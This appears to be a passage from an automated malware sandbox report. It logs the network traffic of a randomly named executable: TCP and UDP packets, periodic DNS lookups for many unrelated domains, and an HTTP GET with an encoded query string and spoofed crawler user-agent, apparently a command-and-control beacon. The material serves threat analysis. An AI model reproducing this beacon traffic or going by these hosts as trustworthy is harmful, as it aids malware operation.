May 27, 2024 12:23:25.367096901 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367115021 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367120981 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.367141008 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.367316008 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.372033119 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.372092009 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.372441053 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.372544050 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.459537029 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.503290892 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.552400112 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552454948 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552510023 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552522898 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552535057 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.552548885 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552568913 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.552867889 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552911043 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.552932978 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552949905 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552962065 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552975893 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.552985907 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.553014994 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.553905964 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.553919077 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.553930044 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.553942919 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.553952932 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.553973913 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.553997993 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554802895 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554833889 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554841995 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.554852009 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554883957 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554888964 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.554898024 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.554929018 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.555820942 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.555835009 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.555847883 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.555867910 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.597024918 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.599654913 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.643888950 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.736589909 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736613035 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736624002 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736641884 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736651897 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.736665964 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736674070 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.736689091 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.736718893 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.737454891 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.737464905 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.737476110 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.737487078 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.737498999 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.737520933 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.972332001 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:26.993424892 CEST	49771	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:26.998858929 CEST	80	49771	202.233.67.46	192.168.2.12
May 27, 2024 12:23:26.999069929 CEST	49771	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:27.001641035 CEST	49771	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:27.006529093 CEST	80	49771	202.233.67.46	192.168.2.12
May 27, 2024 12:23:27.879295111 CEST	80	49771	202.233.67.46	192.168.2.12
May 27, 2024 12:23:27.879326105 CEST	80	49771	202.233.67.46	192.168.2.12
May 27, 2024 12:23:27.879440069 CEST	49771	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:27.883116961 CEST	49771	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:27.888026953 CEST	80	49771	202.233.67.46	192.168.2.12
May 27, 2024 12:23:32.946072102 CEST	49772	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:32.951308012 CEST	80	49772	172.67.137.210	192.168.2.12
May 27, 2024 12:23:32.951431036 CEST	49772	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:33.043162107 CEST	49772	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:33.048422098 CEST	80	49772	172.67.137.210	192.168.2.12
May 27, 2024 12:23:33.907399893 CEST	80	49772	172.67.137.210	192.168.2.12
May 27, 2024 12:23:33.907988071 CEST	80	49772	172.67.137.210	192.168.2.12
May 27, 2024 12:23:33.908149958 CEST	49772	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:34.550326109 CEST	49772	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:35.570210934 CEST	49773	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:35.577322960 CEST	80	49773	172.67.137.210	192.168.2.12
May 27, 2024 12:23:35.577414036 CEST	49773	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:35.579829931 CEST	49773	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:35.586471081 CEST	80	49773	172.67.137.210	192.168.2.12
May 27, 2024 12:23:36.530409098 CEST	80	49773	172.67.137.210	192.168.2.12
May 27, 2024 12:23:36.531161070 CEST	80	49773	172.67.137.210	192.168.2.12
May 27, 2024 12:23:36.532808065 CEST	49773	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:37.081439018 CEST	49773	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:38.100501060 CEST	49774	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:38.105554104 CEST	80	49774	172.67.137.210	192.168.2.12
May 27, 2024 12:23:38.105694056 CEST	49774	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:38.107852936 CEST	49774	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:38.112752914 CEST	80	49774	172.67.137.210	192.168.2.12
May 27, 2024 12:23:38.112874985 CEST	80	49774	172.67.137.210	192.168.2.12
May 27, 2024 12:23:39.075366974 CEST	80	49774	172.67.137.210	192.168.2.12
May 27, 2024 12:23:39.076385021 CEST	80	49774	172.67.137.210	192.168.2.12
May 27, 2024 12:23:39.083097935 CEST	49774	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:39.612649918 CEST	49774	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:40.633738995 CEST	49775	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:40.639030933 CEST	80	49775	172.67.137.210	192.168.2.12
May 27, 2024 12:23:40.643241882 CEST	49775	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:40.643241882 CEST	49775	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:40.648339987 CEST	80	49775	172.67.137.210	192.168.2.12
May 27, 2024 12:23:41.640569925 CEST	80	49775	172.67.137.210	192.168.2.12
May 27, 2024 12:23:41.640841961 CEST	80	49775	172.67.137.210	192.168.2.12
May 27, 2024 12:23:41.640892029 CEST	49775	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:41.644155979 CEST	49775	80	192.168.2.12	172.67.137.210
May 27, 2024 12:23:41.649074078 CEST	80	49775	172.67.137.210	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:13.000874996 CEST	55919	53	192.168.2.12	1.1.1.1
May 27, 2024 12:20:13.149620056 CEST	53	55919	1.1.1.1	192.168.2.12
May 27, 2024 12:20:30.263128996 CEST	59616	53	192.168.2.12	1.1.1.1
May 27, 2024 12:20:30.273499966 CEST	53	59616	1.1.1.1	192.168.2.12
May 27, 2024 12:20:38.356525898 CEST	50269	53	192.168.2.12	1.1.1.1
May 27, 2024 12:20:38.512408018 CEST	53	50269	1.1.1.1	192.168.2.12
May 27, 2024 12:20:52.976525068 CEST	50631	53	192.168.2.12	1.1.1.1
May 27, 2024 12:20:52.988317013 CEST	53	50631	1.1.1.1	192.168.2.12
May 27, 2024 12:21:01.054783106 CEST	52004	53	192.168.2.12	1.1.1.1
May 27, 2024 12:21:01.426556110 CEST	53	52004	1.1.1.1	192.168.2.12
May 27, 2024 12:21:15.133420944 CEST	60408	53	192.168.2.12	1.1.1.1
May 27, 2024 12:21:15.146831036 CEST	53	60408	1.1.1.1	192.168.2.12
May 27, 2024 12:21:28.242216110 CEST	57517	53	192.168.2.12	1.1.1.1
May 27, 2024 12:21:28.673271894 CEST	53	57517	1.1.1.1	192.168.2.12
May 27, 2024 12:21:41.915467024 CEST	49837	53	192.168.2.12	1.1.1.1
May 27, 2024 12:21:42.114053965 CEST	53	49837	1.1.1.1	192.168.2.12
May 27, 2024 12:21:55.210576057 CEST	58667	53	192.168.2.12	1.1.1.1
May 27, 2024 12:21:55.479561090 CEST	53	58667	1.1.1.1	192.168.2.12
May 27, 2024 12:22:08.728085995 CEST	64621	53	192.168.2.12	1.1.1.1
May 27, 2024 12:22:09.034044981 CEST	53	64621	1.1.1.1	192.168.2.12
May 27, 2024 12:22:22.571348906 CEST	52411	53	192.168.2.12	1.1.1.1
May 27, 2024 12:22:22.876955986 CEST	53	52411	1.1.1.1	192.168.2.12
May 27, 2024 12:22:36.397519112 CEST	64791	53	192.168.2.12	1.1.1.1
May 27, 2024 12:22:36.593282938 CEST	53	64791	1.1.1.1	192.168.2.12
May 27, 2024 12:22:50.101288080 CEST	51005	53	192.168.2.12	1.1.1.1
May 27, 2024 12:22:50.813819885 CEST	53	51005	1.1.1.1	192.168.2.12
May 27, 2024 12:23:04.772536993 CEST	64571	53	192.168.2.12	1.1.1.1
May 27, 2024 12:23:04.904407024 CEST	53	64571	1.1.1.1	192.168.2.12
May 27, 2024 12:23:18.555143118 CEST	49938	53	192.168.2.12	1.1.1.1
May 27, 2024 12:23:19.374005079 CEST	53	49938	1.1.1.1	192.168.2.12
May 27, 2024 12:23:32.922597885 CEST	56415	53	192.168.2.12	1.1.1.1
May 27, 2024 12:23:32.940949917 CEST	53	56415	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 12:20:13.000874996 CEST	192.168.2.12	1.1.1.1	0x6fc3	Standard query (0)	www.skinut-ves.ru	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:30.263128996 CEST	192.168.2.12	1.1.1.1	0x3180	Standard query (0)	www.digishieldu.online	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:38.356525898 CEST	192.168.2.12	1.1.1.1	0x9809	Standard query (0)	www.mediciconstanta.ro	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:52.976525068 CEST	192.168.2.12	1.1.1.1	0xaa46	Standard query (0)	www.onitango-test.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:01.054783106 CEST	192.168.2.12	1.1.1.1	0x101c	Standard query (0)	www.celluslim.com.br	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:15.133420944 CEST	192.168.2.12	1.1.1.1	0x62f	Standard query (0)	www.supermontage.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:28.242216110 CEST	192.168.2.12	1.1.1.1	0x6ef6	Standard query (0)	www.spotgush.top	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:41.915467024 CEST	192.168.2.12	1.1.1.1	0x6285	Standard query (0)	www.drdavidglassman.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:55.210576057 CEST	192.168.2.12	1.1.1.1	0xd004	Standard query (0)	www.topscaleservices.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:08.728085995 CEST	192.168.2.12	1.1.1.1	0xa159	Standard query (0)	www.pinpointopia.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:22.571348906 CEST	192.168.2.12	1.1.1.1	0x44fe	Standard query (0)	www.shy-models.ru	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:36.397519112 CEST	192.168.2.12	1.1.1.1	0xec0d	Standard query (0)	www.chooceseafood.ca	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:50.101288080 CEST	192.168.2.12	1.1.1.1	0x2129	Standard query (0)	www.knockdubai.ae	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:04.772536993 CEST	192.168.2.12	1.1.1.1	0x57b4	Standard query (0)	www.arsenjev.fun	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:18.555143118 CEST	192.168.2.12	1.1.1.1	0xdfa2	Standard query (0)	www.embrace-counselor.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:32.922597885 CEST	192.168.2.12	1.1.1.1	0x7e8b	Standard query (0)	www.drednents.es	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 27, 2024 12:20:13.149620056 CEST	1.1.1.1	192.168.2.12	0x6fc3	No error (0)	www.skinut-ves.ru		31.31.198.106	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:30.273499966 CEST	1.1.1.1	192.168.2.12	0x3180	Name error (3)	www.digishieldu.online	none	none	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:38.512408018 CEST	1.1.1.1	192.168.2.12	0x9809	No error (0)	www.mediciconstanta.ro	mediciconstanta.ro		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:20:38.512408018 CEST	1.1.1.1	192.168.2.12	0x9809	No error (0)	mediciconstanta.ro		89.42.218.92	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:52.988317013 CEST	1.1.1.1	192.168.2.12	0xaa46	Name error (3)	www.onitango-test.com	none	none	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:01.426556110 CEST	1.1.1.1	192.168.2.12	0x101c	No error (0)	www.celluslim.com.br	celluslim.com.br		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:21:01.426556110 CEST	1.1.1.1	192.168.2.12	0x101c	No error (0)	celluslim.com.br		50.116.86.54	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:15.146831036 CEST	1.1.1.1	192.168.2.12	0x62f	No error (0)	www.supermontage.com		13.248.169.48	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:15.146831036 CEST	1.1.1.1	192.168.2.12	0x62f	No error (0)	www.supermontage.com		76.223.54.146	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:28.673271894 CEST	1.1.1.1	192.168.2.12	0x6ef6	No error (0)	www.spotgush.top		66.29.149.46	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:42.114053965 CEST	1.1.1.1	192.168.2.12	0x6285	No error (0)	www.drdavidglassman.com		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:55.479561090 CEST	1.1.1.1	192.168.2.12	0xd004	No error (0)	www.topscaleservices.com	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:21:55.479561090 CEST	1.1.1.1	192.168.2.12	0xd004	No error (0)	zhs.zohosites.com		136.143.186.12	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:09.034044981 CEST	1.1.1.1	192.168.2.12	0xa159	No error (0)	www.pinpointopia.com		216.40.34.41	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:22.876955986 CEST	1.1.1.1	192.168.2.12	0x44fe	No error (0)	www.shy-models.ru	shy-models.ru		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:22:22.876955986 CEST	1.1.1.1	192.168.2.12	0x44fe	No error (0)	shy-models.ru		185.215.4.44	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:36.593282938 CEST	1.1.1.1	192.168.2.12	0xec0d	No error (0)	www.chooceseafood.ca		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:50.813819885 CEST	1.1.1.1	192.168.2.12	0x2129	No error (0)	www.knockdubai.ae	knockdubai.ae		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:22:50.813819885 CEST	1.1.1.1	192.168.2.12	0x2129	No error (0)	knockdubai.ae		103.120.178.210	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:04.904407024 CEST	1.1.1.1	192.168.2.12	0x57b4	No error (0)	www.arsenjev.fun		217.107.219.102	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:19.374005079 CEST	1.1.1.1	192.168.2.12	0xdfa2	No error (0)	www.embrace-counselor.com		202.233.67.46	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:32.940949917 CEST	1.1.1.1	192.168.2.12	0x7e8b	No error (0)	www.drednents.es		172.67.137.210	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:32.940949917 CEST	1.1.1.1	192.168.2.12	0x7e8b	No error (0)	www.drednents.es		104.21.81.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.skinut-ves.ru

www.mediciconstanta.ro

www.celluslim.com.br

www.supermontage.com

www.spotgush.top

www.drdavidglassman.com

www.topscaleservices.com

www.pinpointopia.com

www.shy-models.ru

www.chooceseafood.ca

www.knockdubai.ae

www.arsenjev.fun

www.embrace-counselor.com

www.drednents.es

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49722	31.31.198.106	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:13.502289057 CEST	425	OUT	GET /pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt HTTP/1.1 Host: www.skinut-ves.ru Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:20:14.204536915 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:20:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED] Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server5.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>  </title><style media="all">/!***********************************************************************************************************************************************************************************************!\ !* css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ! \************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57px [TRUNCATED]
May 27, 2024 12:20:14.204610109 CEST	1236	IN	Data Raw: 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d Data Ascii: Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_p
May 27, 2024 12:20:14.204643965 CEST	448	IN	Data Raw: 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 7d Data Ascii: (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-p
May 27, 2024 12:20:14.204678059 CEST	1236	IN	Data Raw: 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 Data Ascii: age__content-wrapper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__content-wrapper_style_indent_new{padding-right:48px;padding-left:48px}html:not(.is_adaptive) .b-page__content-wrapper{width:
May 27, 2024 12:20:14.204766989 CEST	1236	IN	Data Raw: 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 38 70 78 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 2d 6c 69 6e 6b 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 62 2d 70 61 67 65 5f 5f 61 Data Ascii: erif;line-height:58px}.b-page__addition-title-link{text-decoration:none}.b-page__addition-title-link:hover{text-decoration:underline}.b-page__addition-title .b-title{display:inline}.b-page__addition-item{position:relative;float:right;padding-r
May 27, 2024 12:20:14.204802990 CEST	448	IN	Data Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a Data Ascii: *******************************************************************************************************************!\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_mod
May 27, 2024 12:20:14.204930067 CEST	1236	IN	Data Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 30 3b 63 6f Data Ascii: ************************************************************/.b-text{padding:0;color:#364364;font:15px/24px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin:0 0 24px}.b-text.b-text_margin_top{margin-top:24px}.b-text_size_giant{
May 27, 2024 12:20:14.204998016 CEST	1236	IN	Data Raw: 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 36 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72 67 65 Data Ascii: Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.b-text_size_large-compact.b-text_margin_top,.b-text_size_large.b-text_margin_top{margin-top:36px}.b-text_size_large-compact{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,Fr
May 27, 2024 12:20:14.205029964 CEST	448	IN	Data Raw: 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 38 70 78 7d 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 6e 6f 6e 65 7b 6d 61 72 67 69 6e 3a 30 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 Data Ascii: sans-serif;margin-bottom:18px}.b-text_margin_none{margin:0}html:not(.is_adaptive) .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_giant-
May 27, 2024 12:20:14.205260038 CEST	1236	IN	Data Raw: 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 34 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 Data Ascii: ,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_huge\@desktop{font:48px/60px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}html:not(.is_adaptive) .b-text_size_h
